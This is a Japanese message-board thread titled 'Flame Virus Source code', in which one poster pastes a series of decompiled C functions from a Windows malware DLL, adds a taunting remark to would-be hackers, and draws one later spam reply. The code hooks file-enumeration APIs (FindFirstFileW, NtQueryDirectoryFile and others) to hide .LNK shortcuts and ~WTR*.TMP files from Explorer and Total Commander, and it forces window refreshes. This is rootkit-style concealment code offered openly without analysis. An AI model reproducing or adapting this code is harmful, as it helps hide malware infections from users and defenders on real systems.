したらばTOP ■掲示板に戻る■ 全部 1-100 最新50 | |

Flame Virus Source code

1sasami_327:2013/06/29(土) 19:25:32
//----- (10001230) --------------------------------------------------------
char __userpurge sub_10001230<al>(signed int a1<eax>, int a2<ecx>, unsigned int a3, int a4)
{
int v4; // edi@1
char result; // al@2
signed int v6; // esi@3

v4 = a2;
if ( a1 & 1 )
{
result = 0;
}
else
{
v6 = a1 / 2;
if ( (a4 & a3) != -1 && (a4 || a3 != 4171) || v6 <= 4 || !sub_10001340(4, a2 + 2 * v6 - 8, (int)L".LNK") )
result = sub_100012A0(v4, v6, a3, a4) != 0;
else
result = 1;
}
return result;
}
// 10005384: using guessed type wchar_t a_lnk[5];
2sasami_327:2013/06/29(土) 19:26:08
//----- (100012A0) --------------------------------------------------------
char __userpurge sub_100012A0<al>(int a1<edi>, int a2, unsigned int a3, int a4)
{
int v4; // esi@1
signed int v6; // ecx@9
unsigned __int16 v7; // ax@10

v4 = 0;
if ( ((a4 & a3) == -1 || !a4 && a3 >= 0x1000 && a3 <= 0x800000)
&& a2 == 12
&& sub_10001340(4, a1 + 16, (int)L".TMP")
&& sub_10001340(12, a1, (int)L"~WTR") )
{
v6 = 4;
while ( 1 )
{
v7 = *(_WORD *)(a1 + 2 * v6);
if ( v7 < 0x30u )
break;
if ( v7 > 0x39u )
break;
++v6;
v4 = (v7 + v4 - 48) % 10;
if ( v6 > 7 )
return v4 == 0;
}
}
return 0;
}
// 10005390: using guessed type wchar_t a_tmp[5];
// 1000539C: using guessed type wchar_t aWtr[5];

3sasami_327:2013/06/29(土) 19:26:47
//----- (10001340) --------------------------------------------------------
char __usercall sub_10001340<al>(int a1<eax>, int a2<edx>, int a3<ecx>)
{
unsigned __int16 v3; // ax@1
int v4; // edi@1
int v5; // esi@1
int v6; // edx@3
int v7; // eax@5
char result; // al@9

v4 = a1;
v3 = *(_WORD *)a3;
v5 = a2;
if ( *(_WORD *)a3 )
{
while ( v4 )
{
v6 = v3;
if ( (unsigned int)v3 - 97 <= 0x19 )
v6 = v3 - 32;
v7 = *(_WORD *)v5;
if ( (unsigned int)(v7 - 97) <= 0x19 )
v7 -= 32;
if ( v6 != v7 )
break;
v3 = *(_WORD *)(a3 + 2);
a3 += 2;
v5 += 2;
--v4;
if ( !v3 )
goto LABEL_9;
}
result = 0;
}
else
{
LABEL_9:
result = 1;
}
return result;
}

4sasami_327:2013/06/29(土) 19:27:46
//----- (10001390) --------------------------------------------------------
char __usercall sub_10001390<al>(int a1<eax>, int a2<edx>, int a3<ecx>, int a4<esi>)
{
char result; // al@2

switch ( a4 )
{
case 3:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 94;
result = 1;
break;
case 1:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 64;
result = 1;
break;
case 2:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 68;
result = 1;
break;
case 37:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 104;
result = 1;
break;
case 38:
*(_DWORD *)a1 = 60;
*(_DWORD *)a2 = 40;
*(_DWORD *)a3 = 80;
result = 1;
break;
case 12:
*(_DWORD *)a1 = 8;
*(_DWORD *)a2 = -1;
*(_DWORD *)a3 = 12;
result = 1;
break;
default:
result = 0;
break;
}
return result;
}

5sasami_327:2013/06/29(土) 19:28:16

//----- (10001430) --------------------------------------------------------
BOOL __cdecl sub_10001430()
{
sub_100019A0("FindFirstFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001580, (int)&dword_1000617C);
sub_100019A0("FindNextFileW", (DWORD)"KERNEL32.DLL", (int)sub_10001600, (int)&dword_10006180);
sub_100019A0("FindFirstFileExW", (DWORD)"KERNEL32.DLL", (int)sub_10001700, (int)&dword_10006184);
sub_100019A0("NtQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178);
sub_100019A0("ZwQueryDirectoryFile", (DWORD)"NTDLL.DLL", (int)sub_100014C0, (int)&dword_10006178);
return sub_10001790();
}
// 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);
// 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD);
// 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD);
// 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

6sasami_327:2013/06/29(土) 19:28:51

//----- (100014C0) --------------------------------------------------------
int __stdcall sub_100014C0(int a1, int a2, int a3, int a4, int a5, unsigned int a6, int a7, int a8, int a9, int a10, int a11)
{
int result; // eax@2
unsigned __int8 v12; // sf@8
unsigned __int8 v13; // of@8
int v14; // [sp+2Ch] [bp-10h]@3
int v15; // [sp+30h] [bp-Ch]@6
int v16; // [sp+34h] [bp-8h]@6
int v17; // [sp+38h] [bp-4h]@6

if ( dword_10006178 )
{
v14 = 0;
while ( 1 )
{
result = dword_10006178(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11);
if ( result )
break;
if ( !a6 )
break;
if ( !sub_10001390((int)&v15, (int)&v17, (int)&v16, a8) || sub_10001090(a7, a6, v17, v16, v15) )
return 0;
LOBYTE(a11) = 0;
v13 = __SETO__(v14 + 1, 10);
v12 = v14++ - 9 < 0;
if ( !(v12 ^ v13) )
return -1073741809;
}
}
else
{
result = -1073741801;
}
return result;
}
// 10006178: using guessed type int (__stdcall *dword_10006178)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

7sasami_327:2013/06/29(土) 19:29:21

//----- (10001580) --------------------------------------------------------
signed int __stdcall sub_10001580(int a1, int a2)
{
int v2; // ebx@2
int v3; // ST08_4@3
unsigned int v4; // ST04_4@3
int v5; // eax@3

if ( !dword_1000617C || (v2 = dword_1000617C(a1, a2), v2 == -1) )
return -1;
v3 = *(_DWORD *)(a2 + 28);
v4 = *(_DWORD *)(a2 + 32);
v5 = lstrlenW((LPCWSTR)(a2 + 44));
if ( sub_10001230(2 * v5, a2 + 44, v4, v3) && !sub_10001600(v2, a2) )
{
SetLastError(2u);
CloseHandle((HANDLE)v2);
return -1;
}
return v2;
}
// 1000617C: using guessed type int (__stdcall *dword_1000617C)(_DWORD, _DWORD);

8sasami_327:2013/06/29(土) 19:30:21

//----- (10001600) --------------------------------------------------------
signed int __stdcall sub_10001600(int a1, int a2)
{
int v3; // esi@3
signed int v4; // eax@5
signed int v5; // edi@6
signed int v6; // eax@10
int v7; // ecx@10
int v8; // esi@12
int v9; // edx@14
char v10; // zf@16
int v11; // [sp+Ch] [bp-Ch]@10
unsigned int v12; // [sp+10h] [bp-8h]@5
int v13; // [sp+14h] [bp-4h]@5

if ( dword_10006180 )
{
v3 = a2;
LABEL_4:
while ( dword_10006180(a1, v3) )
{
v12 = *(_DWORD *)(v3 + 32);
v13 = *(_DWORD *)(v3 + 28);
v4 = 2 * lstrlenW((LPCWSTR)(v3 + 44));
if ( !(v4 & 1) )
{
v5 = v4 / 2;
if ( ((v13 & v12) == -1 || !v13 && v12 == 4171) && v5 > 4 )
{
v7 = (int)L".LNK";
v6 = 4;
v11 = v3 + 44 + 2 * v5 - 8 - (_DWORD)L".LNK";
while ( v6 )
{
v8 = *(_WORD *)v7;
if ( (unsigned int)(v8 - 97) <= 0x19 )
v8 -= 32;
v9 = *(_WORD *)(v11 + v7);
if ( (unsigned int)(v9 - 97) <= 0x19 )
v9 -= 32;
v10 = v8 == v9;
v3 = a2;
if ( !v10 )
break;
v7 += 2;
--v6;
if ( !*(_WORD *)v7 )
goto LABEL_4;
}
}
if ( sub_100012A0(v3 + 44, v5, v12, v13) )
continue;
}
return 1;
}
}
return 0;
}
// 10005384: using guessed type wchar_t a_lnk[5];
// 10006180: using guessed type int (__stdcall *dword_10006180)(_DWORD, _DWORD);

9sasami_327:2013/06/29(土) 19:31:20
こんぐらいのプログラムを組めるようになってから、ハッカーを名乗れよ屑

10sasami_327:2013/06/29(土) 19:32:20

//----- (10001700) --------------------------------------------------------
int __stdcall sub_10001700(int a1, int a2, int a3, int a4, int a5, int a6)
{
int result; // eax@2
int v7; // edi@2
int v8; // ST14_4@4
unsigned int v9; // ST10_4@4
int v10; // eax@4

if ( !dword_10006184 || (result = dword_10006184(a1, a2, a3, a4, a5, a6), v7 = result, result == -1) )
return -1;
if ( a2 )
return result;
v8 = *(_DWORD *)(a3 + 28);
v9 = *(_DWORD *)(a3 + 32);
v10 = lstrlenW((LPCWSTR)(a3 + 44));
if ( sub_10001230(2 * v10, a3 + 44, v9, v8) && !sub_10001600(v7, a3) )
{
SetLastError(2u);
CloseHandle((HANDLE)v7);
return -1;
}
return v7;
}
// 10006184: using guessed type int (__stdcall *dword_10006184)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

11sasami_327:2013/06/29(土) 19:34:20

//----- (10001790) --------------------------------------------------------
BOOL __cdecl sub_10001790()
{
LPARAM v0; // esi@1
HANDLE v1; // eax@1
WCHAR String1; // [sp+8h] [bp-208h]@1
char v4; // [sp+Ah] [bp-206h]@1

String1 = 0;
sub_10002D70(&v4, 0, 0x206u);
v0 = 0;
v1 = GetCurrentProcess();
GetModuleBaseNameW(v1, 0, &String1, 0x104u);
if ( !lstrcmpiW(&String1, L"totalcmd.exe") || !lstrcmpiW(&String1, L"wincmd.exe") )
v0 = 1;
return EnumWindows((WNDENUMPROC)EnumFunc, v0);
}

12sasami_327:2013/06/29(土) 19:36:31

//----- (10001810) --------------------------------------------------------
signed int __stdcall EnumFunc(HWND hWnd, int a2)
{
DWORD dwProcessId; // [sp+0h] [bp-4h]@1

dwProcessId = 0;
GetWindowThreadProcessId(hWnd, &dwProcessId);
if ( dwProcessId == GetCurrentProcessId() )
sub_10001850((__int32)hWnd, a2);
return 1;
}

13sasami_327:2013/06/29(土) 19:37:35
//----- (10001850) --------------------------------------------------------
__int32 __userpurge sub_10001850<eax>(__int32 result<eax>, int a2)
{
LPARAM v2; // esi@1
DWORD v3; // eax@6
DWORD v4; // eax@6
WCHAR String1; // [sp+4h] [bp-208h]@4

v2 = result;
if ( result )
{
result = IsWindowVisible((HWND)result);
if ( result )
{
if ( a2 )
{
v3 = GetCurrentThreadId();
SendMessageW((HWND)v2, 28u, 0, v3);
v4 = GetCurrentThreadId();
SendMessageW((HWND)v2, 0x1Cu, 1u, v4);
result = SendMessageW((HWND)v2, 6u, 2u, v2);
}
else
{
GetClassNameW((HWND)v2, &String1, 260);
result = lstrcmpiW(&String1, L"Progman");
if ( result )
{
sub_10001910((HWND)v2);
result = EnumChildWindows((HWND)v2, (WNDENUMPROC)sub_100018F0, 0);
}
}
}
}
return result;
}

14sasami_327:2013/06/29(土) 19:38:11

//----- (100018F0) --------------------------------------------------------
signed int __stdcall sub_100018F0(HWND a1, int a2)
{
sub_10001910(a1);
return 1;
}

//----- (10001910) --------------------------------------------------------
void *__usercall sub_10001910<eax>(HWND a1<esi>)
{
void *result; // eax@1
WCHAR String1; // [sp+0h] [bp-208h]@1
char v3; // [sp+2h] [bp-206h]@1

String1 = 0;
result = sub_10002D70(&v3, 0, 0x206u);
if ( a1 )
{
result = (void *)IsWindowVisible(a1);
if ( result )
{
GetClassNameW(a1, &String1, 260);
if ( !lstrcmpiW(&String1, L"SysListView32") || (result = (void *)lstrcmpiW(&String1, L"DirectUIHWND"), !result) )
{
PostMessageW(a1, 256u, 116u, 0);
result = (void *)PostMessageW(a1, 0x101u, 0x74u, 0);
}
}
}
return result;
}

15check this out:2013/12/20(金) 13:16:18
nZ86Rr I really liked your article.Really thank you! Great.
新着レスの表示

名前: E-mail(省略可)

※書き込む際の注意事項はこちら

※画像アップローダーはこちら

(画像を表示できるのは「画像リンクのサムネイル表示」がオンの掲示板に限ります)
掲示板管理者へ連絡 無料レンタル掲示板